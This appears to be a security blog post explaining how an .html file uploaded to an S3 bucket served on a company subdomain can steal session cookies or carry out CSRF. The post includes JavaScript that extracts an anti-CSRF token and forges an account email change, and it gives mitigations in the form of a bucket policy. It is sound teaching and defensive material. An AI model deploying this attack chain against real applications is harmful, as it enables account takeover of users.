# Week 59 - File Upload -> CSRF

When testing a file upload that lands in an S3 bucket, I always recommend trying to upload .html files, since in certain cases you can use them to steal a user's session cookie. The first check is that S3 actually returns the object as text/html: S3 serves whatever Content-Type was stored with the object (the default is binary/octet-stream, which the browser downloads rather than renders), so the upload must either let you set Content-Type or the application must set it for you.

Assuming you can successfully upload .html files, the next thing to check is whether the bucket is fronted by a CNAME on a subdomain of the application (i.e. subdomain\[.]example\[.]com points at the bucket's S3 endpoint, such as s3\[.]amazonaws\[.]com/bucket). If it is, your uploaded page renders with an origin of subdomain\[.]example\[.]com instead of an amazonaws\[.]com origin, and that is what makes everything below possible.

Now if this is the case, and the application on the main domain sets its session cookie with the 'Domain' attribute (Domain=example\[.]com), the browser sends that cookie to every subdomain, so JavaScript in your uploaded page can read it from document.cookie and exfiltrate it across the full scope of the main domain. This assumes the 'Path' attribute is not set to a directory outside of the upload path (a cookie with Path=/app is not sent for /uploads/x.html). If this doesn't work because the cookie is marked 'HttpOnly', document.cookie will not expose it, but the browser still attaches it to every request the page makes, so you can fall back to Cross-Site Request Forgery:

CSRF is possible from the subdomain because the SameSite attribute is enforced per site, not per origin: the registrable domain (AKA root domain) is the same, so even a SameSite=Strict cookie is sent on a request from subdomain\[.]example\[.]com to example\[.]com. One caveat: modern browsers treat the scheme as part of the site (schemeful same-site), so the uploaded page needs to be served over HTTPS like the main application. You can also often bypass CORS, since applications frequently use a regex to allow any subdomain to make credentialed cross-origin requests and read the response. Together this means a CSRF attack with POST data is possible, and even a CSRF token does not stop it: fetch the page that contains the token with credentials, parse it out of the response, and initiate a new request with it.

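As an added example (not code from the original post), this is the logic an uploaded page on subdomain.example.com could run against the main application. It shows the three steps described above: a simplified same-site check to illustrate why SameSite does not help, a direct read of the session cookie when it is not HttpOnly, and the HttpOnly fallback that fetches a page with credentials, parses out the anti-CSRF token and replays it. The endpoint paths, the `csrf_token` field, the `session` cookie name and the fake server are constructed assumptions for the demo; a real target's CORS policy must also allow the subdomain origin with credentials for the token fetch to succeed.

```javascript
// Added example, not from the original post. Paths, field names, cookie
// name and the fake server below are assumptions made for the demo.

// SameSite is decided by "site" (scheme + registrable domain), not origin.
// The registrable domain is approximated as the last two labels; browsers
// use the Public Suffix List, so treat this as an illustration only.
function sameSite(urlA, urlB) {
  const a = new URL(urlA), b = new URL(urlB);
  const reg = (h) => h.split('.').slice(-2).join('.');
  return a.protocol === b.protocol && reg(a.hostname) === reg(b.hostname);
}

// Step 1: with Domain=example.com and no HttpOnly flag, the subdomain page
// can read the session cookie straight out of document.cookie.
function readCookie(cookieHeader, name) {
  for (const part of cookieHeader.split(';')) {
    const [k, ...v] = part.trim().split('=');
    if (k === name) return v.join('=');
  }
  return null;
}

// Step 2 (HttpOnly fallback): pull the anti-CSRF token out of a page the
// victim can see. A regex is enough here; DOMParser is the robust choice.
function extractCsrfToken(html) {
  const m = html.match(/name="csrf_token"\s+value="([^"]+)"/);
  return m ? m[1] : null;
}

// Step 3: the full chain. fetchImpl is injected so it can run offline
// against the fake server; in the uploaded page it would simply be fetch.
async function forgeEmailChange(origin, newEmail, fetchImpl = fetch) {
  // credentials: 'include' sends the victim's cookies (SameSite permits it,
  // the target's CORS policy must allow the subdomain with credentials).
  const page = await fetchImpl(`${origin}/account/settings`, {
    credentials: 'include',
  });
  const token = extractCsrfToken(await page.text());
  if (!token) throw new Error('no csrf token in response');

  const body = new URLSearchParams({ csrf_token: token, email: newEmail });
  const res = await fetchImpl(`${origin}/account/email`, {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: body.toString(),
  });
  return { token, status: res.status };
}

// Constructed stand-in for the target application so the chain runs with
// no network: it hands out a token on GET and checks it on POST.
function fakeServer() {
  const state = { email: 'victim@example.com', token: 'tok-123' };
  const respond = (status, text) => ({ status, text: async () => text });
  const fetchImpl = async (url, opts = {}) => {
    if (opts.credentials !== 'include') return respond(401, '');
    const { pathname } = new URL(url);
    if (pathname === '/account/settings') {
      return respond(200,
        `<form><input type="hidden" name="csrf_token" value="${state.token}"></form>`);
    }
    if (pathname === '/account/email' && opts.method === 'POST') {
      const form = new URLSearchParams(opts.body);
      if (form.get('csrf_token') !== state.token) return respond(403, 'bad token');
      state.email = form.get('email');
      return respond(200, 'ok');
    }
    return respond(404, '');
  };
  return { state, fetchImpl };
}
```

Run offline with `const s = fakeServer(); forgeEmailChange('https://example.com', 'attacker@evil.test', s.fetchImpl)` and inspect `s.state.email` afterwards; the token check passes precisely because the token was fetched with the victim's cookies rather than guessed.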
To prevent this sort of attack from occurring, it is recommended to add statements to your bucket policy that allow the s3:PutObject action only for object keys ending in the extensions you actually want (images, PDFs, etc). An explicit Deny on everything else is the more robust form, because an explicit deny in the bucket policy also overrides permissions that presigned URLs inherit from the signing principal. Bear in mind that the policy constrains only the key name, not the stored Content-Type, so the application (or the conditions in the presigned POST policy it hands out) must also pin Content-Type. The strongest fix is to serve user uploads from a separate registrable domain, which makes the cookie, SameSite and CORS reasoning above inapplicable.

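As an added example of the recommended policy (not taken from the original post), the statement below denies s3:PutObject for any key in the bucket that does not end in an allowed extension. The bucket name `example-uploads` and the extension list are assumptions; adjust both to your own bucket. IAM resource matching is case-sensitive and `*` matches across `/`, so a key like `uploads/evil.html` is denied while `uploads/photo.png` is allowed regardless of prefix.

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "DenyUploadsOutsideAllowedExtensions",
      "Effect": "Deny",
      "Principal": "*",
      "Action": "s3:PutObject",
      "NotResource": [
        "arn:aws:s3:::example-uploads/*.png",
        "arn:aws:s3:::example-uploads/*.jpg",
        "arn:aws:s3:::example-uploads/*.jpeg",
        "arn:aws:s3:::example-uploads/*.pdf"
      ]
    }
  ]
}
```

Because this is a Deny with NotResource, it applies to every principal, including your own application role and any presigned URL it signs, which is what you want for an extension allow-list. It says nothing about Content-Type: a `.png` key uploaded with `Content-Type: text/html` is still served as HTML, so enforce the type at upload time as well (for presigned POST, a `["starts-with", "$Content-Type", "image/"]` condition).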
Have any other ideas on attacking unrestricted file upload to an S3 bucket? Let me know in the comments. I have an in-depth post coming up on the modern state of Cross-Site Request Forgery, so stay tuned!

![](/files/bqspmZBLsuKIXRhiF2oX)
